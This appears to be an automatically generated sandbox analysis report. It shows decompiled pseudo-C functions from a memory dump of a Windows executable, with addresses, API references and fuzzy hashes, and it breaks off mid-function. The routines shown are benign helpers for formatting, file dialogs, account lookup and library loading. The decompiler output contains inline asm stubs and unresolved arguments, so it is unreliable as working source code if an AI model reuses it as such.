                                                                                                                • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}













                                                                                                                0x00405132
                                                                                                                0x00405135
                                                                                                                0x00405139
                                                                                                                0x0040513e
                                                                                                                0x00405141
                                                                                                                0x004051b3
                                                                                                                0x00405143
                                                                                                                0x00405145
                                                                                                                0x00405147
                                                                                                                0x0040514c
                                                                                                                0x0040514e
                                                                                                                0x00405151
                                                                                                                0x00405151
                                                                                                                0x0040515b
                                                                                                                0x0040515c
                                                                                                                0x0040515d
                                                                                                                0x0040515e
                                                                                                                0x0040515f
                                                                                                                0x00405168
                                                                                                                0x00405169
                                                                                                                0x00405171
                                                                                                                0x00405173
                                                                                                                0x00405174
                                                                                                                0x00405182
                                                                                                                0x00405184
                                                                                                                0x00405189
                                                                                                                0x0040518c
                                                                                                                0x00405194
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405196
                                                                                                                0x0040519a
                                                                                                                0x0040519b
                                                                                                                0x004051a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004051a1
                                                                                                                0x004051a3
                                                                                                                0x004051a3
                                                                                                                0x004051a6
                                                                                                                0x004051af
                                                                                                                0x004051b0
                                                                                                                0x004051b7

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                                • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 43%
                                                                                                                			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}









                                                                                                                0x004075bb
                                                                                                                0x004075c2
                                                                                                                0x004075c7
                                                                                                                0x004075ca
                                                                                                                0x004075cd
                                                                                                                0x004075d8
                                                                                                                0x004075e9
                                                                                                                0x004075fc
                                                                                                                0x00407600
                                                                                                                0x00407601
                                                                                                                0x00407606
                                                                                                                0x00407609
                                                                                                                0x0040760e
                                                                                                                0x00407619
                                                                                                                0x0040761e
                                                                                                                0x0040761f
                                                                                                                0x00407624
                                                                                                                0x00407636

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf
                                                                                                                • String ID: %%-%d.%ds
                                                                                                                • API String ID: 3988819677-2008345750
                                                                                                                • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                                • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}















                                                                                                                0x00405080
                                                                                                                0x00405086
                                                                                                                0x0040508b
                                                                                                                0x0040508e
                                                                                                                0x00405091
                                                                                                                0x00405097
                                                                                                                0x0040509d
                                                                                                                0x004050a4
                                                                                                                0x004050ab
                                                                                                                0x004050b2
                                                                                                                0x004050b5
                                                                                                                0x004050bc
                                                                                                                0x004050cb
                                                                                                                0x004050e0
                                                                                                                0x004050cd
                                                                                                                0x004050d1
                                                                                                                0x004050dc
                                                                                                                0x004050dc

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileNameOpenwcscpy
                                                                                                                • String ID: L
                                                                                                                • API String ID: 3246554996-2909332022
                                                                                                                • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                                • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}







                                                                                                                0x00409072
                                                                                                                0x00409074
                                                                                                                0x0040907d
                                                                                                                0x00409086
                                                                                                                0x0040908e
                                                                                                                0x004090a5
                                                                                                                0x004090a5
                                                                                                                0x0040908e
                                                                                                                0x004090ac

                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc
                                                                                                                • String ID: LookupAccountSidW$Y@
                                                                                                                • API String ID: 190572456-2352570548
                                                                                                                • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                                • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}







                                                                                                                0x0040ad8c
                                                                                                                0x0040ad93
                                                                                                                0x0040ad95
                                                                                                                0x0040ad9d
                                                                                                                0x0040ada5
                                                                                                                0x0040adb2
                                                                                                                0x0040adb2
                                                                                                                0x0040adb5
                                                                                                                0x0040adbf

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                                • String ID: shlwapi.dll
                                                                                                                • API String ID: 4092907564-3792422438
                                                                                                                • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                                • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}





                                                                                                                0x00406597
                                                                                                                0x00406598
                                                                                                                0x004065a0
                                                                                                                0x004065aa
                                                                                                                0x004065ac
                                                                                                                0x004065ac
                                                                                                                0x004065bd

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • wcsrchr.MSVCRT ref: 004065A0
                                                                                                                • wcscat.MSVCRT ref: 004065B6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                • String ID: _lng.ini
                                                                                                                • API String ID: 383090722-1948609170
                                                                                                                • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                                • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                                0x0040ac59
                                                                                                                0x0040ac60
                                                                                                                0x0040ac68
                                                                                                                0x0040ac6d
                                                                                                                0x0040ac75
                                                                                                                0x0040ac7b
                                                                                                                0x00000000
                                                                                                                0x0040ac7b
                                                                                                                0x0040ac6d
                                                                                                                0x0040ac80

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                • API String ID: 946536540-880857682
                                                                                                                • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                                • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}





                                                                                                                0x00406670
                                                                                                                0x0040667a
                                                                                                                0x00406680
                                                                                                                0x00406686
                                                                                                                0x0040668b
                                                                                                                0x0040668d
                                                                                                                0x00406693
                                                                                                                0x00406699
                                                                                                                0x0040669f
                                                                                                                0x004066a9
                                                                                                                0x004066ac
                                                                                                                0x004066af
                                                                                                                0x004066b9
                                                                                                                0x004066c7
                                                                                                                0x004066d9
                                                                                                                0x004066c9
                                                                                                                0x004066c9
                                                                                                                0x004066cc
                                                                                                                0x004066cf
                                                                                                                0x004066d2
                                                                                                                0x004066d5
                                                                                                                0x004066d5
                                                                                                                0x004066db
                                                                                                                0x004066dd
                                                                                                                0x004066e0
                                                                                                                0x004066e8
                                                                                                                0x004066fa
                                                                                                                0x004066ea
                                                                                                                0x004066ea
                                                                                                                0x004066ed
                                                                                                                0x004066f0
                                                                                                                0x004066f3
                                                                                                                0x004066f6
                                                                                                                0x004066f6
                                                                                                                0x004066fc
                                                                                                                0x004066fe
                                                                                                                0x00406701
                                                                                                                0x00406709
                                                                                                                0x0040671b
                                                                                                                0x0040670b
                                                                                                                0x0040670b
                                                                                                                0x0040670e
                                                                                                                0x00406711
                                                                                                                0x00406714
                                                                                                                0x00406717
                                                                                                                0x00406717
                                                                                                                0x0040671d
                                                                                                                0x0040671f
                                                                                                                0x00406722
                                                                                                                0x0040672a
                                                                                                                0x0040673c
                                                                                                                0x0040672c
                                                                                                                0x0040672c
                                                                                                                0x0040672f
                                                                                                                0x00406732
                                                                                                                0x00406735
                                                                                                                0x00406738
                                                                                                                0x00406738
                                                                                                                0x0040673f
                                                                                                                0x00406745

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1860491036-0
                                                                                                                • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                                                • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}















                                                                                                                0x004054ea
                                                                                                                0x004054ec
                                                                                                                0x004054f1
                                                                                                                0x004054f4
                                                                                                                0x004054f7
                                                                                                                0x004054fa
                                                                                                                0x004054fe
                                                                                                                0x00405501
                                                                                                                0x00405505
                                                                                                                0x00405508
                                                                                                                0x0040550b
                                                                                                                0x0040551b
                                                                                                                0x0040550d
                                                                                                                0x0040550f
                                                                                                                0x0040550f
                                                                                                                0x00405521
                                                                                                                0x00405527
                                                                                                                0x0040552b
                                                                                                                0x0040552e
                                                                                                                0x0040553f
                                                                                                                0x00405530
                                                                                                                0x00405532
                                                                                                                0x00405532
                                                                                                                0x00405556
                                                                                                                0x00405561
                                                                                                                0x0040556e
                                                                                                                0x00405571
                                                                                                                0x00405578
                                                                                                                0x0040557e

                                                                                                                APIs
                                                                                                                • wcslen.MSVCRT ref: 004054EC
                                                                                                                • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                                  • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                                  • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                                                  • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                                • memcpy.MSVCRT ref: 00405556
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 726966127-0
                                                                                                                • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                                • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
